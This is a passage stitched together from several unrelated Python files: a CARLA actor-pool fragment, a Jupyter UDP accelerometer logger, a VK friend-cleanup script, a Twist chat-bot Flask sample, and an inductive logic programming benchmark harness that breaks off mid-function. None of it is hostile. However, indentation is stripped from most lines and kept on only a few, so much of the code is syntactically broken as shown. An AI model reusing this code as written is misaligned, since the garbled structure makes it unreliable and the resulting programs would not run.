DestroyActor = carla.command.DestroyActor # pylint: disable=invalid-name
batch = []
for actor_id in CarlaActorPool._carla_actor_pool.copy():
batch.append(DestroyActor(CarlaActorPool._carla_actor_pool[actor_id]))
if CarlaActorPool._client:
try:
CarlaActorPool._client.apply_batch_sync(batch)
except RuntimeError as e:
if "time-out" in str(e):
pass
else:
raise e
CarlaActorPool._carla_actor_pool = dict()
CarlaActorPool._world = None
CarlaActorPool._client = None
CarlaActorPool._spawn_points = None
CarlaActorPool._spawn_index = 0
@staticmethod
def remove_actors_in_surrounding(location, distance):
"""
Remove all actors from the pool that are closer than distance to the
provided location
"""
for actor_id in CarlaActorPool._carla_actor_pool.copy():
if CarlaActorPool._carla_actor_pool[actor_id].get_location().distance(location) < distance:
CarlaActorPool._carla_actor_pool[actor_id].destroy()
CarlaActorPool._carla_actor_pool.pop(actor_id)
# Remove all keys with None values
CarlaActorPool._carla_actor_pool = dict({k: v for k, v in CarlaActorPool._carla_actor_pool.items() if v})
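# ---------------------------------------------------------------------------
# Usage sketch (not part of the original module): assuming a CARLA server is
# reachable on localhost:2000, the classes above are typically wired together
# as below -- hand the world to the data provider, register actors, and read
# the buffered values back after each tick. This helper is illustrative only
# and is never called from this module.
def _example_provider_usage():
    client = carla.Client('localhost', 2000)
    world = client.get_world()
    CarlaDataProvider.set_world(world)
    CarlaActorPool.set_client(client)
    CarlaActorPool.set_world(world)
    spawn_point = CarlaDataProvider.get_map().get_spawn_points()[0]
    vehicle = CarlaActorPool.request_new_actor('vehicle.tesla.model3', spawn_point)
    CarlaDataProvider.register_actor(vehicle)
    CarlaDataProvider.on_carla_tick()
    print(CarlaDataProvider.get_velocity(vehicle), CarlaDataProvider.get_location(vehicle))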
|
logger.py
|
#!/usr/bin/python
# logger.py
#
# Accelerometer server helper code
import socketserver
import socket
import time
from threading import Thread, Lock
import sys
from IPython.display import display
import ipywidgets as widgets
import matplotlib.pyplot as plt
# Configuration options
HOST = None
PORT = 9999
STATION_ID = "codetacc"
PREFER_SUBNET = "192.168"
CLIENT_TIMEOUT = 15000
# State options
STATE_DISCONNECTED = "DISCONNECTED"
STATE_CONNECTED = "CONNECTED"
STATE_RUNNING = "RUNNING"
STATE_STOPPED = "STOPPED"
# Message codes
OPCODE_CONFIGURE = 'r'
OPCODE_START = 's'
OPCODE_HALT = 'h'
OPCODE_KEEPALIVE = 'k'
OPCODE_PING = 'p'
OPCODE_ANNOUNCE = 'a'
RESPONSECODE_CLIENT = 'c'
RESPONSECODE_DATA = 'd'
# Dictionary to contain all client data
clients = dict()
# Dictionary lock
client_lock = Lock()
# Current data collection runtime
ms = 0
# Accelerometer Configuration
samplerate = "g"
samplerange = "b"
# Configuration code dictionary with human readable values
dividers = {"a": 16380, "b": 8192, "c": 4096, "d": 2048}
rates = {"a": "1 Hz", "b": "10 Hz", "c": "25 Hz", "d": "50 Hz", "e": "100 Hz", "f": "200 Hz", "g": "400 Hz"}
ranges = {"a": "2G", "b": "4G", "c": "8G", "d": "16G"}
# UI elements that need global access
sample_count_labels = dict()
status_labels = dict()
milliseconds_label = widgets.Label(value="0", layout=widgets.Layout(width="100%"))
_main_tabs = None
_status_panel = None
_export_panel = None
_settings_panel = None
# UDP Helper functions
def udp_send(ip, data):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)
s.connect((ip, PORT))
    s.send(data.encode())
s.close()
def udp_broadcast(data):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(('', 0))
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    s.sendto(data.encode(), ('<broadcast>', PORT))
s.close()
def send_configuration(ip):
udp_send(ip, OPCODE_CONFIGURE + samplerate + samplerange)
# Accelerometer command broadcasts
def broadcast_configure():
print("Configuring accelerometers with rate " + rates[samplerate] + " and range " + ranges[samplerange])
udp_broadcast(OPCODE_CONFIGURE + samplerate + samplerange)
def signal_start():
udp_broadcast(OPCODE_START)
global ms
ms = 0
print("Started data collection")
def halt_data_collection():
udp_broadcast(OPCODE_HALT)
print("Halted data collection")
pass
# Monitor thread that runs broadcasts and checks for timeouts every 5 seconds
class MonitorThread(Thread):
def __init__(self):
self.stopped = False
Thread.__init__(self)
def run(self):
while not self.stopped:
# Announce this station
udp_broadcast(OPCODE_ANNOUNCE + " " + STATION_ID)
# Check for timed out clients
client_lock.acquire()
            for ip, client in clients.items():
if time.time() - client.last_announce > CLIENT_TIMEOUT:
client.state = STATE_DISCONNECTED
client_lock.release()
# Wait 5 seconds
time.sleep(5)
# Accelerometer Client object that stores connection info, state and client data
class AccelerometerClient(object):
def __init__(self, ip, clientId):
self.state = STATE_CONNECTED
self.events = list()
self.ip = ip
self.clientId = clientId
self.update_announce()
def update_announce(self):
self.last_announce = time.time()
def chunk(self, l, n):
        for i in range(0, len(l), n):
yield l[i:i + n]
def process_data(self, data):
global ms
self.events.extend(self.chunk(data.split(' '), 5))
last_event = self.events[-1]
last_time = int(last_event[1])
self.update_announce()
if last_time > ms + 200:
ms = last_time
update_status()
# UDP listener that responds to packets sent by clients
class AccelUDPHandler(socketserver.BaseRequestHandler):
def handle(self):
        global clients, _status_panel
# Get a packet
        # Decode the raw UDP payload (assumed to be ASCII text) so the opcode
        # comparisons and string handling below work on str
        packet = self.request[0].strip().decode()
# If the packet has data
if len(packet):
client_ip = self.client_address[0]
# Handle client announcements
if packet[0] == RESPONSECODE_CLIENT:
                if client_ip not in clients:
                    client_lock.acquire()
                    clients[client_ip] = AccelerometerClient(client_ip, packet[1:])
                    client_lock.release()
                    _status_panel = build_status_panel()
                    _main_tabs.children = [ _status_panel, _export_panel, _settings_panel ]
                    print(clients[client_ip].clientId + " connected")
                    send_configuration(client_ip)
                else:
                    clients[client_ip].update_announce()
# Handle data packets
elif packet[0] == RESPONSECODE_DATA:
if client_ip in clients:
clients[client_ip].process_data(packet[1:])
# Required mix-in class for threaded UDP server
class ThreadedUDPServer(socketserver.ThreadingMixIn, socketserver.UDPServer):
pass
# Get a list of local interfaces and a good guess as to which interface to use
def get_interfaces():
global PREFER_SUBNET
ipmaybe = ([l for l in ([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2] if not ip.startswith("127.")][:1], [
[(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) for s in
[socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]]) if l][0][0])
ipmaybe = [ipmaybe] if type(ipmaybe) is str else ipmaybe
if type(ipmaybe) is str:
default = ipmaybe
else:
default = ipmaybe[0]
for ip in ipmaybe:
if ip.startswith(PREFER_SUBNET):
default = ip
return ipmaybe, default
# Updates UI status during data collection
def update_status():
    global milliseconds_label
global sample_count_labels
global ms
milliseconds_label.value = str(ms)
    for client in clients.values():
sample_count_labels[client.clientId].value = str(len(client.events))
# Formats a single client data event for fractions of Gs
def format_event(clientId, event):
output_arr = [None] * 5
output_arr[0] = str(clientId)
output_arr[1] = event[1]
output_arr[2] = float(event[2]) / dividers[samplerange]
output_arr[3] = float(event[3]) / dividers[samplerange]
output_arr[4] = float(event[4]) / dividers[samplerange]
return output_arr
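# Worked example (informal): with samplerange "b" the divider is 8192, so a raw event
# ['d', '120', '4096', '-8192', '0'] from client "c1" is formatted by format_event as
# ['c1', '120', 0.5, -1.0, 0.0] -- raw counts scaled to fractions of a G.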
# Writes client data to CSV
def write_data(filename):
if filename.find('.csv') <= -1:
filename = filename.strip() + '.csv'
f = open(filename, 'w')
f.write("clientId,ms,x,y,z")
f.write("\n")
for key in clients:
client = clients[key]
for event in client.events:
output_arr = format_event(client.clientId, event)
outs = [ str(val) for val in output_arr ]
output = ",".join(outs)
f.write(output)
f.write("\n")
client.events = list()
f.flush()
f.close()
print("Data written to " + filename)
pass
# Starts server threads (and user interface)
def start():
cpanel()
global HOST
if HOST is None:
_, HOST = get_interfaces()
print("Starting station " + STATION_ID + " on " + str(HOST) + " with port " + str(PORT))
try:
global monitor_thread
monitor_thread = MonitorThread()
monitor_thread.start()
accelServer = ThreadedUDPServer((HOST, PORT), AccelUDPHandler)
accelThread = Thread(target=accelServer.serve_forever)
accelThread.start()
print("Server is listening")
except Exception as e:
print(e)
# Outputs a matplotlib preview of client data
def plot():
print("Plotting preview...")
global clients
f, subplots = plt.subplots(len(clients), 3, sharex='col', sharey='row')
    for i, key in enumerate(clients):
        client = clients[key]
client_name = client.clientId
if len(clients) == 1:
x = subplots[0]
y = subplots[1]
z = subplots[2]
else:
x = subplots[i][0]
y = subplots[i][1]
z = subplots[i][2]
x.set_title(client_name + " x")
y.set_title(client_name + " y")
z.set_title(client_name + " z")
ms = list()
x_vals = list()
y_vals = list()
z_vals = list()
for event in client.events:
scaled = format_event(client.clientId, event)
ms.append(scaled[1])
x_vals.append(scaled[2])
y_vals.append(scaled[3])
z_vals.append(scaled[4])
x.scatter(ms, x_vals)
y.scatter(ms, y_vals)
z.scatter(ms, z_vals)
# Builds export panel UI tab
def build_export_panel():
global clients
export_text = widgets.Text(
value="accelerometer.csv"
)
export_button = widgets.Button(
description="Export"
)
preview_button = widgets.Button(
description="Preview"
)
def export_click(b):
write_data(export_text.value)
def preview_click(b):
plot()
export_button.on_click(export_click)
preview_button.on_click(preview_click)
left = widgets.VBox([widgets.Label(value="Filename"), widgets.Label()])
middle = widgets.VBox([export_text, widgets.Label()])
right = widgets.VBox([export_button, preview_button])
export_panel = widgets.HBox([left, middle, right])
return export_panel
# Builds status panel UI tab
def build_status_panel():
global clients
global sample_count_labels
start = widgets.Button(
description="Start"
)
stop = widgets.Button(
description="Stop"
)
def stop_click(b):
halt_data_collection()
def start_click(b):
signal_start()
start.on_click(start_click)
stop.on_click(stop_click)
col1_children = [ start, stop, widgets.Label() ]
    col2_children = [ widgets.Label() for _ in range(3) ]
col3_children = [ widgets.Label(value="Milliseconds", layout=widgets.Layout(width="100%")), widgets.Label(), widgets.Label(value="Status") ]
col4_children = [ milliseconds_label, widgets.Label(), widgets.Label("Samples")]
    for _, accel in clients.items():
col2_children.append(widgets.Label(value=accel.clientId))
status_labels[accel.clientId] = widgets.Label(
value=accel.state,
layout=widgets.Layout(width="100%")
)
col3_children.append(status_labels[accel.clientId])
sample_count_labels[accel.clientId] = widgets.Label(
value=str(len(accel.events))
)
col4_children.append(sample_count_labels[accel.clientId])
status_panel = widgets.HBox([widgets.VBox(col1_children), widgets.VBox(col2_children), \
widgets.VBox(col3_children), widgets.VBox(col4_children)])
return status_panel
# Builds settings panel UI tab
def build_settings_panel():
def get_new_value(change):
if change['type'] == 'change' and change['name'] == 'value':
return change['new']
else:
return None
def rate_setting_change(change):
global samplerate
val = get_new_value(change)
if val:
samplerate = val
broadcast_configure()
    def range_setting_change(change):
global samplerange
val = get_new_value(change)
if val:
samplerange = val
broadcast_configure()
rate_setting = widgets.Dropdown(
options = list(zip(["1 Hz", "10 Hz", "25 Hz", "50 Hz", "100 Hz", "200 Hz", "400 Hz"], ["a", "b", "c", "d", "e", "f", "g"])),
value = samplerate
)
rate_setting.observe(rate_setting_change)
range_setting = widgets.Dropdown(
options = list(zip(["2 G", "4 G", "8 G", "16 G"], ["a", "b", "c", "d"])),
value = samplerange
)
range_setting.observe(range_setting_change)
labels = [widgets.Label(value=x) for x in ["Rate", "Range"]]
settings = [rate_setting, range_setting]
label_box = widgets.VBox(labels)
settings_box = widgets.VBox(settings)
config_options = widgets.HBox([label_box, settings_box])
return config_options
# Shows main user interface
def cpanel():
global _main_tabs
_main_tabs = widgets.Tab()
global _status_panel
global _export_panel
global _settings_panel
_status_panel = build_status_panel()
_export_panel = build_export_panel()
_settings_panel = build_settings_panel()
_main_tabs.children = [ _status_panel, _export_panel, _settings_panel ]
_main_tabs.set_title(0, "Collect Data")
_main_tabs.set_title(1, "Export Data")
_main_tabs.set_title(2, "Settings")
display(_main_tabs)
# Interactively configure server options before startup
def configure():
interfaces, default = get_interfaces()
interfaces = widgets.Dropdown(
options = interfaces,
value = default,
)
port = widgets.Text(
value='9999',
placeholder='Port',
disabled=False
)
server_id_text = widgets.Text(
value='codetacc',
placeholder='Station ID',
disabled=False
)
header = widgets.Label(
value='Configure your server',
layout=widgets.Layout(width='100%')
)
go = widgets.Button(
description='Start server',
layout=widgets.Layout(width="100%")
)
left_box = widgets.VBox([ widgets.Label(value=x, disabled=True) for x in ["Interface", "Port", "Station ID", ""] ])
right_box = widgets.VBox([interfaces, port, server_id_text, go])
settings_box = widgets.HBox([left_box, right_box])
settings_panel = widgets.VBox([header, settings_box])
def start_clicked(b):
settings_panel.close()
cpanel()
global STATION_ID
global HOST
global PORT
HOST = interfaces.value
PORT = int(port.value)
STATION_ID = server_id_text.value
start()
go.on_click(start_clicked)
display(settings_panel)
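# Usage sketch (not part of the original helper): this module is meant to be driven from
# a Jupyter notebook, since the UI is built from ipywidgets. The helper below is purely
# illustrative and is never called here.
def _example_notebook_usage():
    # Option 1: show the interactive configuration form, which starts the server on click
    configure()
    # Option 2: start immediately with the module-level defaults (HOST, PORT, STATION_ID)
    # start()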
|
clean.py
|
#Python 3.7.4
#Make by: Lonely Dark
#Import modules:
import requests
from time import sleep, strftime
from random import randint
import threading
#Your token:
token='Token here:'
def post(token,fr_list_id):
#Post in your wall
message='This is auto message. Cleared friends: \n '+ str(fr_list_id[::]) + '\n \n Script finished at ' + strftime('%H:%M:%S') + ' ' + strftime('%x')
requests.get('https://api.vk.com/method/wall.post', params={'access_token': token, 'v': '5.101','message': message}).json()
with open('log.txt', 'a') as file:
file.write('[log]:'+'['+strftime('%H:%M:%S')+' '+strftime('%x')+']'+': '+'Request vk_api wall.post'+'\n')
def clear(token):
#Get friends
fr_get_del=requests.get('https://api.vk.com/method/friends.get', params={'access_token': token, 'v': '5.101', 'fields': 'deactivated'}).json()
with open('log.txt', 'a') as file:
file.write('[log]:'+'['+strftime('%H:%M:%S')+' '+strftime('%x')+']'+': '+'Request vk_api friends.get'+'\n')
fr_get_del=fr_get_del['response']
fr_list_id=[]
    #Get friends that are deleted or banned
    for i in fr_get_del['items']:
        if 'deactivated' in i:
            fr_list_id.append(i['id'])
    #If fr_list_id is empty:
if len(fr_list_id)==0:
print('Not found deactivated.')
message='This is auto message. \n Not found friends deactivated, goodbye! \n \n Script finished at ' + strftime('%H:%M:%S') + ' ' + strftime('%x')
requests.get('https://api.vk.com/method/wall.post', params={'access_token': token, 'v': '5.101', 'message': message}).json()
with open('log.txt', 'a') as file:
file.write('[log]:'+'['+strftime('%H:%M:%S')+' '+strftime('%x')+']'+': '+'Nothing in fr_list_id, exit.'+'\n')
return False
else:
#Else:
for i in fr_list_id:
#Delete friends banned or deleted
requests.get('https://api.vk.com/method/friends.delete', params={'access_token': token, 'v': '5.101', 'user_id': i}).json()
with open('log.txt', 'a') as file:
file.write('[log]:'+'['+strftime('%H:%M:%S')+' '+strftime('%x')+']'+': '+'Delete friend: @id' + str(i)+'\n')
#Sleep random range 0,3 sec
sleep(randint(0,3))
#Add to fr_list_id @id
for i in range(len(fr_list_id)):
fr_list_id[i]='@id'+str(fr_list_id[i])
print('Delete: \n'+ str(fr_list_id[::]))
#Run post()
th=threading.Thread(target=post, args=(token,fr_list_id))
with open('log.txt', 'a') as file:
file.write('[log]:'+'['+strftime('%H:%M:%S')+' '+strftime('%x')+']'+': '+'Run Thread post'+'\n')
th.start()
main=threading.Thread(target=clear, args=(token,))
with open('log.txt', 'a') as file:
file.write('[log]:'+'['+strftime('%H:%M:%S')+' '+strftime('%x')+']'+': '+'Run Thread main'+'\n')
main.start()
main.join()
|
server.py
|
from flask import Flask, request, Response
import requests
import time
from datetime import datetime
from threading import Thread
app = Flask(__name__)
app.debug = True
GREETINGS = ["HI", "HELLO", "HEY"]
@app.route("/bot", methods=["POST"])
def message_received():
request_data = request.form
event_type = request_data.get("event_type")
# It's good practice with Twist integrations to support being
# pinged, it's a good way to test that your integration is
# successfully talking to Twist. This ping is done from the bot
# section of the integration's configuration
if event_type == "ping":
return Response("pong")
# Here we pass the processing of the message off to a background thread
# We do this so that we can immediately respond to the message to
# acknowledge we've received it
thr = Thread(target=process_bot_conversation, args=[request_data])
thr.start()
# This tells the server we've received the message ok
# Optionally, you can also respond with some message text, this
# text would then be displayed as a message to the user who sent
# it. This message could be to say that the bot is handling their
# request
return "", 202
def process_bot_conversation(form_data):
url_callback = form_data.get("url_callback")
url_ttl = form_data.get("url_ttl")
message = create_message_response(form_data)
# We need to check whether the callback url has timed out, we
# give you 30 minutes in order to send your message, after which
# the callback url will have expired
if url_has_timed_out(url_ttl):
print(
"URL for responding has timed out, message id: %s"
% form_data.get("message_id")
)
return
send_reply(url_callback, message)
def create_message_response(form_data):
"""This method is the crux of the bot in terms of determining the content
that will be returned to the user"""
current_content = form_data.get("content")
message = "I didn't understand that please type 'help' to see how to use this bot"
greeting = next(
(x for x in GREETINGS if current_content.upper().startswith(x)), "none"
)
if not greeting == "none":
user_name = form_data.get("user_name")
message = u"Hello %s!" % (user_name)
# This is here to purely demonstrate that a bot's response could
# take a while, thus why this sample is showing how to use the
# url_callback approach.
time.sleep(5)
elif current_content == "help":
message = "This sample allows you to say 'hi' or 'hello' to the bot"
return message
def send_reply(url_callback, message):
payload = {"content": message}
response = requests.post(url_callback, data=payload)
response_json = response.json()
if "error_string" in response_json.keys():
print("API error: %s" % response_json["error_string"])
return
else:
if response.status_code == 200:
print("Message sent successfully")
else:
            print(
                "There was an error posting the message, status code: %s"
                % response.status_code
            )
def url_has_timed_out(url_ttl):
ttl_datetime = datetime.fromtimestamp(float(url_ttl))
now = datetime.now()
return now > ttl_datetime
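# Local-run sketch (not part of the original sample): the host and port below are
# assumptions for local testing only; a real Twist integration also needs this endpoint
# to be publicly reachable and configured as the bot URL in the integration's settings.
if __name__ == "__main__":
    app.run(host="0.0.0.0", port=8080)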
|
benchmark.py
|
#!/usr/bin/env python3
import os
import sys
import psutil
import pathlib
import subprocess
import numpy as np
import scipy.stats as stats
from popper.split import runner, prog_to_code
from popper.utils import Settings
from pyswip import Prolog
from multiprocessing.pool import Pool, ThreadPool
from multiprocessing import Process
import multiprocessing
import gen_data
import time
import pathlib
import logging
import random
import math
from datetime import datetime
NUM_TRAIN_EXAMPLES = 10
NUM_TEST_EXAMPLES = 1000
NUM_CPUS = 1
TIMEOUT = 300
TRIALS = list(range(1,21))
TASKS = []
TASKS += ['trains1']
TASKS += ['trains2']
TASKS += ['trains3']
TASKS += ['trains4']
TASKS += ['iggp-minimal-decay']
TASKS += ['iggp-buttons']
TASKS += ['iggp-rps']
TASKS += ['iggp-coins']
TASKS += ['dropk']
TASKS += ['droplast']
TASKS += ['evens']
TASKS += ['finddup']
TASKS += ['last']
TASKS += ['len']
TASKS += ['sorted']
TASKS += ['sumlist']
path = pathlib.Path().resolve()
def partmap(func, jobs, num_cpus=NUM_CPUS):
    if num_cpus == 1:
        return list(map(func, jobs))
    with ThreadPool(num_cpus) as p:
        return list(p.map(func, jobs))
def get_time():
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
return current_time
def parpmap(func, jobs, num_cpus=NUM_CPUS):
    # p = ctx.Process(target=run_experiment, args=(problem, config, experiment, sema, results), name=f'{problem}::{config}')
    # p.start()
    # if num_cpus == 1:
    #     return list(map(func, jobs))
    with Pool(num_cpus, maxtasksperchild=1) as p:
        return list(p.map(func, jobs))
# # old and horrible code
def call_(cmd, action=None, timeout=None):
cmd = cmd.split(' ')
p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
if action != None:
p.stdin.write(action.encode('utf-8'))
try:
output, _err = p.communicate(timeout = timeout)
return output.decode()
except subprocess.TimeoutExpired:
pass
finally:
try:
parent = psutil.Process(p.pid)
for child in parent.children(recursive=True):
child.kill()
except psutil.NoSuchProcess:
pass
p.kill()
def call_prolog(files, action, timeout):
files = ','.join((f"'{x}'" for x in files))
cmd = f"load_files([{files}],[silent(true)]). {action}."
# print(cmd)
return call_('swipl -q', cmd, timeout)
def train_metagol(settings):
task = settings.task
trial = settings.trial
metarules = 'metarules'
if 'iggp' in task:
ex_file = f'data/{task}/data/train/exs.pl'
prim_file = f'data/{task}/metagol.pl'
bk_file = f'data/{task}/data/train/bk.pl'
elif 'train' in task:
ex_file = f'data/{task}/data/train/{trial}.pl'
prim_file = f'data/prims-trains.pl'
bk_file = f'data/bk-trains.pl'
else:
ex_file = f'data/{task}/data/train/{trial}.pl'
prim_file = f'data/prims-lists.pl'
bk_file = f'data/bk-lists.pl'
metarules = 'metarules-rec'
load_files = ['metagol', prim_file, metarules, ex_file, bk_file]
t1 = time.time()
prog = call_prolog(load_files, 'run', TIMEOUT)
t2 = time.time()
if prog != None:
prog = [x for x in prog.split('\n') if ':-' in x]
save_prog(settings, prog, t2-t1)
def train_aleph(settings):
task = settings.task
trial = settings.trial
if 'iggp' in task:
train_file = f'{path}/data/{task}/aleph.pl'
else:
train_file = f'{path}/data/{task}/data/aleph/{trial}.pl'
cmd = "induce(P),writeln('<PROG>'),numbervars(P,0,_),foreach(member(C,P),(write(C),write('. '))),writeln('</PROG>'),halt"
load_files = [train_file]
t1 = time.time()
try:
prog = call_prolog(load_files, cmd, TIMEOUT)
except:
prog = None
t2 = time.time()
if prog != None:
xs = prog.split('<PROG>')
if len(xs) > 1:
prog = xs[1].split('</PROG>')[0]
# print('PROG1',prog)
prog = prog.replace('\n', ' ')
prog = [x.strip() for x in prog.split('.') if len(x.strip()) > 0]
# print('PROG2',prog)
else:
prog = None
save_prog(settings, prog, t2-t1)
def gen_aleph_input(pos, neg, bk_file, bias_file, out_file):
with open(out_file, 'w') as f:
# read general aleph settings
with open(bias_file) as tmp:
f.write(tmp.read() + '\n')
f.write(':-begin_bg.\n')
with open(bk_file) as tmp:
f.write(tmp.read() + '\n')
f.write(':-end_bg.\n')
f.write(':-begin_in_pos.\n')
for x in pos:
x = x[4:].replace('))',')')
f.write(x + '\n')
f.write(':-end_in_pos.\n')
f.write(':-begin_in_neg.\n')
for x in neg:
x = x[4:].replace('))',')')
f.write(x + '\n')
f.write(':-end_in_neg.\n')
def gen_list_data():
probs = []
probs += [('dropk', gen_data.DropK)]
probs += [('droplast', gen_data.DropLast)]
probs += [('evens', gen_data.Evens)]
probs += [('finddup', gen_data.FindDupl)]
probs += [('last', gen_data.Last)]
probs += [('len', gen_data.Len)]
probs += [('member', gen_data.Member)]
probs += [('sorted', gen_data.Sorted)]
probs += [('sumlist', gen_data.SumList)]
for (task, _) in probs:
with open(f'data/{task}/all-bias.pl', 'w') as f:
with open(f'data/bias-list.pl') as tmp:
for line in tmp:
f.write(line)
f.write('\n')
with open(f'data/{task}/bias.pl') as tmp:
for line in tmp:
f.write(line)
for (task, x) in probs:
pathlib.Path(f'{path}/data/{task}/data/train/').mkdir(parents=True, exist_ok=True)
pathlib.Path(f'{path}/data/{task}/data/test/').mkdir(parents=True, exist_ok=True)
pathlib.Path(f'{path}/data/{task}/data/programs').mkdir(parents=True, exist_ok=True)
pathlib.Path(f'{path}/data/{task}/data/results').mkdir(parents=True, exist_ok=True)
for trial in TRIALS:
print(get_time(),f'GEN DATA: task:{task}\t trial:{trial}')
# TRAIN DATA
train_ex_file = f'{path}/data/{task}/data/train/{trial}.pl'
train_pos = [x.gen_pos() for i in range(NUM_TRAIN_EXAMPLES)]
train_neg = [x.gen_neg() for i in range(NUM_TRAIN_EXAMPLES)]
with open(train_ex_file, 'w') as f:
for ex in train_pos:
f.write(f'pos({ex}).\n')
for ex in train_neg:
f.write(f'neg({ex}).\n')
# TEST DATA
            test_ex_file = f'{path}/data/{task}/data/test/{trial}.pl'
            test_pos = [x.gen_pos() for i in range(NUM_TEST_EXAMPLES)]
            test_neg = [x.gen_neg() for i in range(NUM_TEST_EXAMPLES)]
            with open(test_ex_file, 'w') as f:
for ex in test_pos:
f.write(f'pos({ex}).\n')
for ex in test_neg:
f.write(f'neg({ex}).\n')
# WRITE ALEPH INPUT
pathlib.Path(f'{path}/data/{task}/data/aleph/').mkdir(parents=True, exist_ok=True)
train_ex_file = f'{path}/data/{task}/data/aleph/{trial}.pl'
with open(train_ex_file, 'w') as f:
# read general aleph settings
with open('aleph-lists.pl') as tmp:
f.write(tmp.read() + '\n')
# read task-specific aleph settings
with open(f'{path}/data/{task}/aleph.pl') as tmp:
f.write(tmp.read() + '\n')
f.write(':-begin_bg.\n')
with open('data/bk-lists.pl') as tmp:
f.write(tmp.read() + '\n')
f.write(':-end_bg.\n')
f.write(':-begin_in_pos.\n')
for ex in train_pos:
f.write(ex + '.\n')
f.write(':-end_in_pos.\n')
f.write(':-begin_in_neg.\n')
for ex in train_neg:
f.write(ex + '.\n')
f.write(':-end_in_neg.\n')
def partition(xs, rate=80):
k = int((len(xs) / 100)*rate)
return xs[:k], xs[k:]
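# Worked example: partition(list(range(10))) with the default rate of 80 returns
# ([0, 1, 2, 3, 4, 5, 6, 7], [8, 9]), i.e. an 80/20 train/test split.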
def gen_train_data():
probs = []
probs += ['trains1']
probs += ['trains2']
probs += ['trains3']
probs += ['trains4']
for task in probs:
pos = []
neg = []
with open(f'data/{task}/exs.pl') as f:
for line in f:
line = line.strip()
if line.startswith('pos'):
pos.append(line)
elif line.startswith('neg'):
neg.append(line)
for trial in TRIALS:
random.shuffle(pos)
random.shuffle(neg)
train_pos, test_pos = partition(pos)
train_neg, test_neg = partition(neg)
path = f'data/{task}/data/train/'
pathlib.Path(path).mkdir(parents=True, exist_ok=True)
with open(f'{path}/{trial}.pl', 'w') as f:
for x in train_pos + train_neg:
f.write(x + '\n')
path = f'data/{task}/data/test/'
pathlib.Path(path).mkdir(parents=True, exist_ok=True)
with open(f'{path}/{trial}.pl', 'w') as f:
for x in test_pos + test_neg:
f.write(x + '\n')
path = f'data/{task}/data/aleph/'
pathlib.Path(path).mkdir(parents=True, exist_ok=True)
# ALEPH
gen_aleph_input(pos, neg, 'data/bk-trains.pl', f'data/aleph-trains.pl', f'{path}/{trial}.pl',)
def get_prog_file(settings):
path = f'data/{settings.task}/programs'
pathlib.Path(path).mkdir(parents=True, exist_ok=True)
fname = f'{path}/{settings.name}-{settings.trial}.csv'
return fname
def save_prog(settings, prog, duration):
fname = get_prog_file(settings)
with open(fname, 'w') as f:
if prog != None:
for rule in prog:
if rule[-1] != '.':
rule += '.'
f.write(rule + '\n')
f.write(f'%time,{duration}\n')
def save_res(settings, tp, fn, tn, fp):
path = f'data/{settings.task}/results/'
pathlib.Path(path).mkdir(parents=True, exist_ok=True)
fname = f'{path}/{settings.name}-{settings.trial}.csv'
with open(fname, 'w') as f:
f.write(f'{tp}, {fn}, {tn}, {fp}')
# def test_(settings):
# prolog = Prolog()
# prolog.consult(settings.ex_file)
# prolog.consult(settings.bk_file)
# prolog.consult('test.pl')
# prolog.consult(f'data/{settings.task}/programs/{settings.name}-{settings.trial}.csv')
# res = list(prolog.query('do_test(TP,FN,TN,FP)'))[0]
# print(settings.name, settings.trial, res)
# save_res(settings, res['TP'], res['FN'], res['TN'], res['FP'])
def test_(settings):
from multiprocessing import Process
p = Process(target=test__, args=(settings,))
p.start()
p.join()
def test__(settings):
prolog = Prolog()
prolog.consult(settings.ex_file)
prolog.consult(settings.bk_file)
prolog.consult('test.pl')
prolog.consult(f'data/{settings.task}/programs/{settings.name}-{settings.trial}.csv')
res = list(prolog.query('do_test(TP,FN,TN,FP)'))[0]
save_res(settings, res['TP'], res['FN'], res['TN'], res['FP'])
# def test_(settings):
# # prolog = Prolog()
# load_files = [settings.ex_file, settings.bk_file, 'test.pl', f'data/{settings.task}/programs/{settings.name}-{settings.trial}.csv']
# cmd = 'do_test(TP,FN,TN,FP),halt.'
# print(settings.name, settings.trial, res)
# # save_res(settings, res['TP'], res['FN'], res['TN'], res['FP'])
def train_(settings):
t1 = time.time()
prog = runner(settings)
t2 = time.time()
if prog != None:
prog = prog_to_code(prog)
save_prog(settings, prog, t2-t1)
def train_lists(settings):
settings.ex_file = f'{path}/data/{settings.task}/data/train/{settings.trial}.pl'
settings.bias_file = f'{path}/data/{settings.task}/all-bias.pl'
settings.bk_file = f'{path}/data/bk-lists.pl'
train_(settings)
def train_iggp(settings):
settings.ex_file = f'{path}/data/{settings.task}/data/train/exs.pl'
settings.bias_file = f'{path}/data/{settings.task}/bias.pl'
settings.bk_file = f'{path}/data/{settings.task}/data/train/bk.pl'
train_(settings)
def train_trains(settings):
settings.ex_file = f'{path}/data/{settings.task}/data/train/{settings.trial}.pl'
settings.bias_file = f'{path}/data/bias-trains.pl'
settings.bk_file = f'{path}/data/bk-trains.pl'
train_(settings)
def test_lists(settings):
settings.ex_file = f'{path}/data/{settings.task}/data/test/{settings.trial}.pl'
settings.bias_file = f'{path}/data/{settings.task}/all-bias.pl'
settings.bk_file = f'{path}/data/bk-lists.pl'
def test_iggp(settings):
settings.ex_file = f'{path}/data/{settings.task}/data/test/exs.pl'
settings.bias_file = f'{path}/data/{settings.task}/bias.pl'
settings.bk_file = f'{path}/data/{settings.task}/data/test/bk.pl'
def test_trains(settings):
settings.ex_file = f'{path}/data/{settings.task}/data/test/{settings.trial}.pl'
settings.bias_file = f'{path}/data/{settings.task}/bias.pl'
settings.bk_file = f'{path}/data/bk-trains.pl'
def get_metagol_settings(task, trial):
settings = Settings(cmd_line=False)
settings.task = task
settings.trial = trial
settings.name = 'metagol'
return settings
def get_aleph_settings(task, trial):
settings = Settings(cmd_line=False)
settings.task = task
settings.trial = trial
settings.name = 'aleph'
return settings
def get_settings(trial, task, baseline=False, constraints=True, chunking=True, lazy=True, optimistic=False):
settings = Settings(cmd_line=False)
settings.eval_timeout = 0.001
settings.timeout = TIMEOUT
settings.trial = trial
settings.task = task
settings.baseline = baseline
settings.constraints = constraints
settings.chunking = chunking
settings.lazy = lazy
settings.optimistic = optimistic
if baseline:
